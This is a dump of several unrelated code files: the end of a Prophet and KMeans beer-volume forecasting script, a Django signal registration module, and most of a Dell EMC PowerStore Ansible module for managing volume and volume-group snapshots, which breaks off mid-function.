blobkmeans.fit(blob_trans_x)
wcss.append(blobkmeans.inertia_)
plt.figure(figsize=(10, 5))
sns.lineplot(wcss, marker='o', color='red')
plt.title('Elbow Fit - Lotta Variables')
plt.xlabel('Lotta Variables - Number of Clusters')
plt.ylabel('WCSS')
plt.show()
cluster_results = pd.DataFrame(Blob_df, columns=['YearMonth','Volume', 'Price', 'Sales',
'Promotions', 'Avg_Population_2017',
'Avg_Yearly_Household_Income_2017'])
blob_kmeans = KMeans(n_clusters=4)
y = blob_kmeans.fit_predict(cluster_results[['YearMonth','Volume', 'Price', 'Sales',
'Promotions', 'Avg_Population_2017',
'Avg_Yearly_Household_Income_2017']])
y2 = pd.DataFrame(y, columns=[0])
cluster_results['Cluster_Results'] = y2
plt.scatter(blob_trans_x[y == 0, 0],
blob_trans_x[y == 0, 1], s=100, c='red', label='Cluster 1')
plt.scatter(blob_trans_x[y == 1, 0],
blob_trans_x[y == 1, 1], s=100, c='blue', label='Cluster 2')
plt.scatter(blob_trans_x[y == 2, 0],
blob_trans_x[y == 2, 1], s=100, c='green', label='Cluster 3')
plt.scatter(blob_trans_x[y == 3, 0],
blob_trans_x[y == 3, 1], s=100, c='orange', label='Cluster 4')
plt.scatter(blob_kmeans.cluster_centers_[:, 0], blob_kmeans.cluster_centers_[
:, 1], s=100, c='yellow', label='Centroids')
plt.title('Clusters of a Bunch of Variables')
plt.xlabel('Variables')
plt.ylabel('Y')
plt.show()
# KMeans now completed for Promotions and Pricing.
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
######################################################################
# Creating 3 separate Prophet algorithms, which will make a new dataframe
# with industry volume, soda volume, and avg temperature.
### in order to prepare Prophet for making a prediction of SKU 1 and Agency 1
prophet_feed_df = mother_dataframe.copy()
prophet_feed_soda = prophet_feed_df[['YearMonth', 'Soda_Volume']]
prophet_feed_industry = prophet_feed_df[['YearMonth', 'Industry_Volume']]
# For the weather forecast, we will need to train algorithms on all of
# agency 1's data only (regardless of SKU. Filtering out the rest of the agencies...
prophet_feed_weather = prophet_feed_df[['YearMonth', 'Avg_Max_Temp', 'Agency']]
prophet_feed_weather.query('Agency == "Agency_01"', inplace=True)
prophet_feed_weather.drop('Agency', axis=1, inplace=True)
# Assign Prophet friendly names to variables in both data sets.
# Change time to date-time format.
prophet_feed_soda.columns = ['ds', 'y']
prophet_feed_soda['ds'] = to_datetime(prophet_feed_soda['ds'])
prophet_feed_industry.columns = ['ds', 'y']
prophet_feed_industry['ds'] = to_datetime(prophet_feed_industry['ds'])
prophet_feed_weather.columns = ['ds', 'y']
prophet_feed_weather['ds'] = to_datetime(prophet_feed_weather['ds'])
# Label the Meta Prophet algorithm for each variable
industry_prophet = Prophet()
industry_prophet.fit(prophet_feed_industry)
soda_prophet = Prophet()
soda_prophet.fit(prophet_feed_soda)
weather_prophet = Prophet()
weather_prophet.fit(prophet_feed_weather)
# Combine all futures data and evaluate the three Prophets' predictions.
#### Build a Future forecast dataframe for the soda prophet predict.
sodafuture = list()
for s in range(1, 13):
sodadate = '2018-%02d' % s
sodafuture.append([sodadate])
sodafuture = DataFrame(sodafuture)
sodafuture.columns = ['ds']
sodafuture['ds'] = to_datetime(sodafuture['ds'])
#Build Soda Meta Prophet model
### Insert top rated parameters for Soda model
soda_param_grid = {
'changepoint_prior_scale': [0.0001],#This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.001],#This is the lowest value in MAPE reduction
}
soda_all_params = [dict(zip(soda_param_grid.keys(),
sod)) for sod in itertools.product(*soda_param_grid.values())]
for sparams in soda_all_params:
soda_prophet = Prophet(**sparams).fit(prophet_feed_soda)
# Make Soda prediction dataframe.
sodaforecast = soda_prophet.predict(sodafuture)
# Plot the overall beer industry prediction from Soda Prophet
soda_prophet.plot(sodaforecast)
pyplot.show()
# Evaluate performance of the Soda Prophet
soda_crossval = cross_validation(soda_prophet, initial='1095 days', period='31 days', horizon = '365 days')
soda_prophet_performance = performance_metrics(soda_crossval)
soda_fig_performance = plot_cross_validation_metric(soda_crossval, metric='mape')
#### Build a Future forecast dataframe for the industry prophet predict.
industryfuture = list()
for b in range(1, 13):
industrydate = '2018-%02d' % b
industryfuture.append([industrydate])
industryfuture = DataFrame(industryfuture)
industryfuture.columns = ['ds']
industryfuture['ds'] = to_datetime(industryfuture['ds'])
#Build Industry Meta Prophet model
### Insert top rated parameters for Industry model
industry_param_grid = {
'changepoint_prior_scale': [0.0001], #This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.001], #This is the lowest value in MAPE reduction
}
industry_all_params = [dict(zip(industry_param_grid.keys(),
ind)) for ind in itertools.product(*industry_param_grid.values())]
for iparams in industry_all_params:
industry_prophet = Prophet(**iparams).fit(prophet_feed_industry)
# Make industry prediction dataframe.
industryforecast = industry_prophet.predict(industryfuture)
# Plot the overall beer industry prediction from iIndustry Prophet
industry_prophet.plot(industryforecast)
pyplot.show()
# Evaluate performance of the industry Prophet
industry_crossval = cross_validation(industry_prophet, initial='1095 days', period='31 days', horizon = '365 days')
industry_prophet_performance = performance_metrics(industry_crossval)
industry_fig_performance = plot_cross_validation_metric(industry_crossval, metric='mape')
# Build a Future forecast dataframe for the weather prophet predict.
weatherfuture = list()
for c in range(1, 13):
weatherdate = '2018-%02d' % c
weatherfuture.append([weatherdate])
weatherfuture = DataFrame(weatherfuture)
weatherfuture.columns = ['ds']
weatherfuture['ds'] = to_datetime(weatherfuture['ds'])
#Build weather Meta Prophet model
### Insert top rated parameters for weather model
weather_param_grid = {
'changepoint_prior_scale': [0.01],#This is the lowest value in MAPE reduction
'seasonality_prior_scale': [0.01],#This is the lowest value in MAPE reduction
'holidays_prior_scale': [0.0001],
}
weather_all_params = [dict(zip(weather_param_grid.keys(),
wet)) for wet in itertools.product(*weather_param_grid.values())]
for wparams in weather_all_params:
weather_prophet = Prophet(**wparams).fit(prophet_feed_weather)
# Make weather prediction dataframe.
weatherforecast = weather_prophet.predict(weatherfuture)
# Plot the overall beer weather prediction from weather Prophet
weather_prophet.plot(weatherforecast)
pyplot.show()
#Crossval weather Prophet
weatherforecast = weather_prophet.predict(weatherfuture)
weather_crossval = cross_validation(weather_prophet,initial='1095 days', period='31 days', horizon = '365 days')
weather_prophet_performance = performance_metrics(weather_crossval)
weather_fig_performance = plot_cross_validation_metric(weather_crossval, metric='mape')
#########################################################################
# Start merging all predictions onto one data frame,
#and change names of columns for final volume predict.
Futures_df = weatherforecast[['ds', 'yhat']]
Futures_df = Futures_df.rename(columns={'yhat': 'Avg_Max_Temp'})
Futures_df.insert(2, 'yhat', industryforecast['yhat'])
Futures_df = Futures_df.rename(columns={'yhat': 'Industry_Volume'})
Futures_df.insert(3, 'yhat', sodaforecast['yhat'])
Futures_df = Futures_df.rename(columns={'yhat': 'Soda_Volume'})
Futures_df = Futures_df.rename(columns={'YearMonth': 'ds'})
##########################################################################
##Here is the most important part of the whole coding: the last prophet
#That will predict volume based on other prophet algorithm results.
a1s1_prophet_feed = agency1_SKU1_df[['YearMonth','Volume','Avg_Max_Temp',
'Industry_Volume',
'Soda_Volume']]
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'YearMonth': 'ds'})
a1s1_prophet_feed = a1s1_prophet_feed.rename(columns={'Volume': 'y'})
a1s1_prophet = Prophet()
a1s1_prophet.add_regressor('Avg_Max_Temp')
a1s1_prophet.add_regressor('Industry_Volume')
a1s1_prophet.add_regressor('Soda_Volume')
### Add hyper parameter tuning.
a1s1_param_grid = {
'changepoint_prior_scale': [1.6],
'seasonality_prior_scale': [0.1],
#'changepoints': ['2013-10-01','2014-10-01','2015-10-01','2016-10-01','2017-10-01'],
#'seasonality_mode': ['multiplicative'],
'changepoint_range': [0.95],
}
# Generate all combinations of parameters, for a1s1 Prophet
a1s1_all_params = [dict(zip(a1s1_param_grid.keys(),
a1s1)) for a1s1 in itertools.product(*a1s1_param_grid.values())]
# Implement all parameters into algorithm
for a1s1params in a1s1_all_params:
a1s1_prophet = Prophet(**a1s1params).fit(a1s1_prophet_feed)
a1s1forecast = a1s1_prophet.predict(Futures_df)
#Plot the overall volume prediction from a1s1 Prophet
a1s1_prophet.plot(a1s1forecast)
pyplot.show()
#Crossval a1s1 Prophet
a1s1forecast = a1s1_prophet.predict(Futures_df)
a1s1_crossval = cross_validation(a1s1_prophet, initial='1095 days', period='31 days', horizon = '31 days')
a1s1_prophet_performance = performance_metrics(a1s1_crossval)
a1s1_fig_performance = plot_cross_validation_metric(a1s1_crossval, metric='mape')
#Final prediction 1 month
print(a1s1forecast.head(1))
| SpeciesXBeer/BeerVolumeProphet | Entire Beer Volume Forecase .py | Entire Beer Volume Forecase .py | py | 22,300 | python | en | code | 0 | github-code | 36 |
6793257031 | from django.apps import apps
from django.db.models.signals import post_save
from .invitation_status_changed import when_invitation_registration_post_save
from .consultant_validation_status_changed import when_consultant_validation_status_update
def setup_signals():
Invitation = apps.get_model(
app_label='invitation',
model_name='Invitation',
)
ConsultantValidationStatus = apps.get_model(
app_label='consultant',
model_name='ConsultantValidationStatus',
)
post_save.connect(
when_invitation_registration_post_save,
sender=Invitation,
)
post_save.connect(
when_consultant_validation_status_update,
sender=ConsultantValidationStatus,
)
| tomasgarzon/exo-services | service-exo-core/registration/signals/__init__.py | __init__.py | py | 736 | python | en | code | 0 | github-code | 36 |
74059453544 | from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils import dellemc_ansible_utils as utils
import logging
from datetime import datetime, timedelta
from uuid import UUID
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: dellemc_powerstore_snapshot
version_added: '2.6'
short_description: Manage Snapshots on Dell EMC PowerStore.
description:
- Managing Snapshots on PowerStore.
- Create a new Volume Group Snapshot,
- Get details of Volume Group Snapshot,
- Modify Volume Group Snapshot,
- Delete an existing Volume Group Snapshot,
- Create a new Volume Snapshot,
- Get details of Volume Snapshot,
- Modify Volume Snapshot,
- Delete an existing Volume Snapshot.
author:
- Rajshree Khare (Rajshree.Khare@dell.com)
- Prashant Rakheja (prashant.rakheja@dell.com)
extends_documentation_fragment:
- dellemc.dellemc_powerstore
options:
snapshot_name:
description:
- The name of the Snapshot. Either snapshot name or ID is required.
snapshot_id:
description:
- The ID of the Snapshot. Either snapshot ID or name is required.
volume:
description:
- The volume, this could be the volume name or ID.
volume_group:
description:
- The volume group, this could be the volume group name or ID.
new_snapshot_name:
description:
- The new name of the Snapshot.
desired_retention:
description:
- The retention value for the Snapshot.
- If the retention value is not specified, the snap
details would be returned.
- To create a snapshot, either retention or expiration
timestamp must be given.
- If the snap does not have any retention value - specify it as 'None'.
retention_unit:
description:
- The unit for retention.
- If this unit is not specified, 'hours' is taken as default
retention_unit.
- If desired_retention is specified,
expiration_timestamp cannot be specified.
choices: [hours, days]
expiration_timestamp:
description:
- The expiration timestamp of the snapshot. This should be provided in
UTC format, e.g 2019-07-24T10:54:54Z.
description:
description:
- The description for the snapshot.
state:
description:
- Defines whether the Snapshot should exist or not.
required: true
choices: [absent, present]
'''
EXAMPLES = r'''
- name: Create a volume snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
description: "{{description}}"
desired_retention: "{{desired_retention}}"
retention_unit: "{{retention_unit_days}}"
state: "{{state_present}}"
- name: Get details of a volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Rename volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Delete volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_absent}}"
- name: Create a volume group snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp}}"
state: "{{state_present}}"
- name: Get details of a volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Modify volume group snapshot expiration timestamp
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp_new}}"
state: "{{state_present}}"
- name: Rename volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Delete volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_absent}}"
'''
RETURN = r'''
'''
LOG = utils.get_logger('dellemc_powerstore_snapshot',
log_devel=logging.INFO)
py4ps_sdk = utils.has_pyu4ps_sdk()
HAS_PY4PS = py4ps_sdk['HAS_Py4PS']
IMPORT_ERROR = py4ps_sdk['Error_message']
py4ps_version = utils.py4ps_version_check()
IS_SUPPORTED_PY4PS_VERSION = py4ps_version['supported_version']
VERSION_ERROR = py4ps_version['unsupported_version_message']
# Application type
APPLICATION_TYPE = 'Ansible/1.0'
class PowerStoreSnapshot(object):
"""Class with Snapshot operations"""
def __init__(self):
"""Define all the parameters required by this module"""
self.module_params = utils.get_powerstore_management_host_parameters()
self.module_params.update(
get_powerstore_snapshot_parameters())
mutually_exclusive = [
['volume', 'volume_group'], ['snapshot_name', 'snapshot_id'],
['desired_retention', 'expiration_timestamp']
]
required_one_of = [
['snapshot_name', 'snapshot_id'], ['volume', 'volume_group']
]
# Initialize the Ansible module
self.module = AnsibleModule(
argument_spec=self.module_params,
supports_check_mode=True,
mutually_exclusive=mutually_exclusive,
required_one_of=required_one_of
)
LOG.info(
'HAS_PY4PS = {0} , IMPORT_ERROR = {1}'.format(
HAS_PY4PS, IMPORT_ERROR))
if HAS_PY4PS is False:
self.module.fail_json(msg=IMPORT_ERROR)
LOG.info(
'IS_SUPPORTED_PY4PS_VERSION = {0} , VERSION_ERROR = {1}'.format(
IS_SUPPORTED_PY4PS_VERSION,
VERSION_ERROR))
if IS_SUPPORTED_PY4PS_VERSION is False:
self.module.fail_json(msg=VERSION_ERROR)
self.py4ps_conn = utils.get_powerstore_connection(self.module.params,
application_type=APPLICATION_TYPE)
self.protection = self.py4ps_conn.protection
self.provisioning = self.py4ps_conn.provisioning
LOG.info('Got Py4ps instance for PowerStore')
def get_vol_snap_details(self, snapshot):
"""Returns details of a Volume Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_snapshot_details(snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"Volume snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_group_snap_details(self, snapshot):
"""Returns details of a Volume Group Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_group_snapshot_details(
snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"VG snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_snapshot(self, volume_id, snapshot_name, snapshot_id):
"""Get the volume snapshot"""
try:
vol_snaps = self.protection.get_volume_snapshots(volume_id)
snapshot = None
for snap in vol_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume: {0} with error {1}".format(volume_id,
str(e)))
def get_vol_group_snapshot(self, vg_id, snapshot_name, snapshot_id):
"""Get Volume Group Snapshot"""
try:
vg_snaps = self.protection.get_volume_group_snapshots(vg_id)
snapshot = None
for snap in vg_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume group: {0} with error {1}".format(
vg_id, str(e)))
def get_vol_id_from_volume(self, volume):
"""Maps the volume to volume ID"""
is_valid_uuid = self.is_valid_uuid(volume)
if is_valid_uuid:
try:
vol = self.provisioning.get_volume_details(volume)
return vol['id']
except Exception as e:
LOG.info("No volume found by ID: {0}, "
"looking it up by name. Error: {1}".format(volume,
str(e)))
pass
try:
vol = \
self.provisioning.get_volume_by_name(volume)
if vol:
return vol[0]['id']
else:
self.module.fail_json(
msg="Volume {0} was not found on "
"the array.".format(volume))
except Exception as e:
self.module.fail_json(msg="Failed to get vol {0} by "
"name with error "
"{1}".format(volume, str(e)))
def get_vol_group_id_from_vg(self, volume_group):
"""Maps the volume group to Volume Group ID"""
is_valid_uuid = self.is_valid_uuid(volume_group)
if is_valid_uuid:
try:
vg = self.provisioning.get_volume_group_details(
volume_group_id=volume_group)
return vg['id']
except Exception as e:
LOG.info("No volume group found by ID: {0}, "
"looking it up by name. Error {1}".format(
volume_group, str(e)))
pass
try:
vg = \
self.provisioning.get_volume_group_by_name(volume_group)
if vg:
return vg[0]['id']
else:
self.module.fail_json(
msg="Volume Group {0} was not found on "
"the array.".format(volume_group))
except Exception as e:
self.module.fail_json(msg="Failed to get volume group: "
"{0} by name with error: "
"{1}".format(volume_group, str(e)))
def create_vol_snapshot(self, snapshot_name,
description,
volume_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a volume on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
snapshot = self.get_vol_snapshot(volume_id, snapshot_name, None)
if snapshot is not None:
LOG.error("Snapshot: {0} already exists".format(snapshot_name))
return False
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(desired_retention))
).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_snapshot(
name=snapshot_name,
description=description,
volume_id=volume_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'volume {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume'],
str(e)))
self.module.fail_json(msg=error_message.format(snapshot_name,
self.module.params[
'volume'],
str(e)))
def create_vg_snapshot(self, snapshot_name,
description,
vg_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a VG on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(
desired_retention))).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_group_snapshot(
name=snapshot_name,
description=description,
volume_group_id=vg_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'VG {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume_group'],
str(e)))
self.module.fail_json(msg=error_message.format(
snapshot_name,
self.module.params['volume_group'],
str(e)))
def delete_vol_snapshot(self, snapshot):
"""Deletes a Vol snapshot on PowerStore"""
try:
self.protection.delete_volume_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def delete_vol_group_snapshot(self, snapshot):
"""Deletes a Vol group snapshot on PowerStore"""
try:
self.protection.delete_volume_group_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_snapshot(self, snapshot, new_name):
"""Renames a vol snapshot"""
# Check if new name is same is present name
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to rename snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_group_snapshot(self, snapshot, new_name):
"""Renames a vol group snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def check_snapshot_modified(self, snapshot, volume, volume_group,
description, desired_retention,
retention_unit, expiration_timestamp):
"""Determines whether the snapshot has been modified"""
LOG.info("Determining if the snap has been modified...")
snapshot_modification_details = dict()
snapshot_modification_details['is_description_modified'] = False
snapshot_modification_details['new_description_value'] = None
snapshot_modification_details['is_timestamp_modified'] = False
snapshot_modification_details['new_expiration_timestamp_value'] = None
if desired_retention is None and expiration_timestamp is None:
LOG.info("desired_retention and expiration_time are both "
"not provided, we don't check for snapshot modification "
"in this case. The snapshot details would be returned, "
"if available.")
return False, snapshot_modification_details
snap_details = None
if volume is not None:
snap_details = self.get_vol_snap_details(snapshot)
elif volume_group is not None:
snap_details = self.get_vol_group_snap_details(snapshot)
LOG.debug("The snap details are: {0}".format(snap_details))
snap_creation_timestamp = None
if 'creation_timestamp' in snap_details:
# Only taking into account YYYY-MM-DDTHH-MM, ignoring
# seconds component.
snap_creation_timestamp = \
snap_details['creation_timestamp'][0:16] + 'Z'
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.strptime(
snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') +
timedelta(
hours=int(desired_retention))
).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.strptime(
snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.strptime(
snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
LOG.info("The new expiration timestamp is {0}".format(
expiration_timestamp))
modified = False
if 'expiration_timestamp' in snap_details['protection_data'] \
and snap_details['protection_data']['expiration_timestamp'] \
is not None and expiration_timestamp is not None:
# Only taking into account YYYY-MM-DDTHH-MM, ignoring
# seconds component.
if snap_details['protection_data']['expiration_timestamp'][0:16] \
!= expiration_timestamp[0:16]:
# We can tolerate a delta of two minutes.
existing_timestamp = \
snap_details['protection_data']['expiration_timestamp'][
0:16] + 'Z'
new_timestamp = expiration_timestamp[0:16] + 'Z'
existing_time_obj = datetime.strptime(existing_timestamp,
'%Y-%m-%dT%H:%MZ')
new_time_obj = datetime.strptime(new_timestamp,
'%Y-%m-%dT%H:%MZ')
if existing_time_obj > new_time_obj:
td = existing_time_obj - new_time_obj
else:
td = new_time_obj - existing_time_obj
td_mins = int(round(td.total_seconds() / 60))
if td_mins > 2:
snapshot_modification_details[
'is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = \
expiration_timestamp
modified = True
elif 'expiration_timestamp' not in snap_details['protection_data'] \
and expiration_timestamp is not None:
snapshot_modification_details['is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = expiration_timestamp
modified = True
elif 'expiration_timestamp' in snap_details['protection_data'] \
and expiration_timestamp is None:
if snap_details['protection_data'][
'expiration_timestamp'] is not None:
snapshot_modification_details['is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = expiration_timestamp
modified = True
elif 'expiration_timestamp' in snap_details['protection_data'] and \
snap_details['protection_data']['expiration_timestamp'] is \
None and expiration_timestamp is not None:
snapshot_modification_details['is_timestamp_modified'] = True
snapshot_modification_details[
'new_expiration_timestamp_value'] = expiration_timestamp
modified = True
if 'description' in snap_details and description is not None:
if snap_details['description'] != description:
snapshot_modification_details['is_description_modified'] = \
True
snapshot_modification_details['new_description_value'] \
= description
modified = True
LOG.info("Snapshot modified {0}, modification details: {1}"
.format(modified, snapshot_modification_details))
return modified, snapshot_modification_details
def modify_vol_snapshot(self, snapshot,
snapshot_modification_details):
"""Modify a volume snapshot"""
try:
changed = False
if snapshot_modification_details['is_description_modified']:
new_description = \
snapshot_modification_details['new_description_value']
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
description=new_description)
changed = True
if snapshot_modification_details['is_timestamp_modified']:
new_timestamp = \
snapshot_modification_details[
'new_expiration_timestamp_value']
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
expiration_timestamp=new_timestamp)
changed = True
if changed:
resp = self.get_vol_snap_details(
snapshot)
return changed, resp
else:
return changed, None
except Exception as e:
error_message = 'Failed to modify snapshot {0} with error {1}'
LOG.info(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(
msg=error_message.format(snapshot['name'], str(e)))
def modify_vol_group_snapshot(self, snapshot,
snapshot_modification_details):
"""Modify a volume group snapshot"""
try:
changed = False
if snapshot_modification_details['is_description_modified']:
new_description = \
snapshot_modification_details['new_description_value']
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
description=new_description)
changed = True
if snapshot_modification_details['is_timestamp_modified']:
new_timestamp = \
snapshot_modification_details[
'new_expiration_timestamp_value']
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
expiration_timestamp=new_timestamp)
changed = True
if changed:
resp = self.get_vol_group_snap_details(
snapshot)
return changed, resp
else:
return changed, None
except Exception as e:
error_message = 'Failed to modify snapshot {0} with error {1}'
LOG.info(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def is_valid_uuid(self, val):
"""Determines if the string is a valid UUID"""
try:
UUID(str(val))
return True
except ValueError:
return False
def validate_expiration_timestamp(self, expiration_timestamp):
"""Validates whether the expiration timestamp is valid"""
try:
datetime.strptime(expiration_timestamp,
'%Y-%m-%dT%H:%M:%SZ')
except ValueError:
self.module.fail_json(msg='Incorrect date format, '
'should be YYYY-MM-DDTHH:MM:SSZ')
def validate_desired_retention(self, desired_retention):
"""Validates the specified desired retention"""
try:
int(desired_retention)
except ValueError:
if desired_retention == 'None':
LOG.info("Desired retention is set to 'None'")
else:
self.module.fail_json(msg="Please provide a valid integer"
" as the desired retention.")
def perform_module_operation(self):
"""
Perform different actions on VG or volume Snapshot based on user
parameter chosen in playbook
"""
volume = self.module.params['volume']
volume_group = self.module.params['volume_group']
snapshot_name = self.module.params['snapshot_name']
snapshot_id = self.module.params['snapshot_id']
new_snapshot_name = self.module.params['new_snapshot_name']
desired_retention = self.module.params['desired_retention']
retention_unit = self.module.params['retention_unit']
expiration_timestamp = self.module.params['expiration_timestamp']
description = self.module.params['description']
state = self.module.params['state']
result = dict(
changed=False,
create_vg_snap='',
delete_vg_snap='',
modify_vg_snap='',
create_vol_snap='',
delete_vol_snap='',
modify_vol_snap='',
snap_details='',
)
snapshot = None
volume_id = None
volume_group_id = None
if expiration_timestamp is not None:
